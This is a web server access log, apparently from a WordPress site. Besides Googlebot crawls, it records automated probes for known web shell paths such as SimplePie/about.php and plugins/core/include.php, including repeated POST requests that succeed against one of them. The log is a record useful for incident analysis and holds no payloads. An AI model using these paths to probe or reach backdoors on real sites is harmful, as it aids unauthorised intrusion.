173.208.236.138 - - [08/Apr/2025:00:04:28 -0300] "GET /000897866325406.html HTTP/1.1" 200 308612 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.208.236.138 - - [08/Apr/2025:00:04:28 -0300] "GET / HTTP/1.1" 200 324333 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.208.236.138 - - [08/Apr/2025:00:04:30 -0300] "GET /000897866325406.html HTTP/1.1" 200 309014 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.238.24.238 - - [08/Apr/2025:00:10:33 -0300] "GET /class-db.php HTTP/1.1" 403 46952 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [08/Apr/2025:00:10:34 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46952 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
101.99.88.90 - - [08/Apr/2025:00:12:33 -0300] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 200 46952 "-" "GuzzleHttp/7"
101.99.88.90 - - [08/Apr/2025:00:12:35 -0300] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 200 46952 "-" "GuzzleHttp/7"
101.99.88.90 - - [08/Apr/2025:00:12:36 -0300] "POST /wp-includes/SimplePie/about.php HTTP/1.1" 200 47053 "-" "GuzzleHttp/7"
101.99.88.90 - - [08/Apr/2025:00:12:37 -0300] "POST /wp-includes/SimplePie/about.php HTTP/1.1" 200 47055 "-" "GuzzleHttp/7"
101.99.88.90 - - [08/Apr/2025:00:12:38 -0300] "GET /wp-includes/SimplePie/inputs.php HTTP/1.1" 403 46953 "-" "GuzzleHttp/7"
101.99.88.90 - - [08/Apr/2025:00:12:50 -0300] "POST /wp-includes/SimplePie/about.php HTTP/1.1" 200 47055 "-" "GuzzleHttp/7"
101.99.88.90 - - [08/Apr/2025:00:12:51 -0300] "GET /wp-includes/SimplePie/inputs.php HTTP/1.1" 403 46953 "-" "GuzzleHttp/7"
43.166.131.228 - - [08/Apr/2025:00:16:56 -0300] "GET / HTTP/1.1" 200 46953 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
103.132.181.183 - - [08/Apr/2025:00:20:35 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46953 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [08/Apr/2025:00:20:42 -0300] "GET /ws.php HTTP/1.1" 403 46953 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [08/Apr/2025:00:20:47 -0300] "GET /404.php HTTP/1.1" 403 46953 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [08/Apr/2025:00:20:50 -0300] "GET /wp.php HTTP/1.1" 403 46954 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
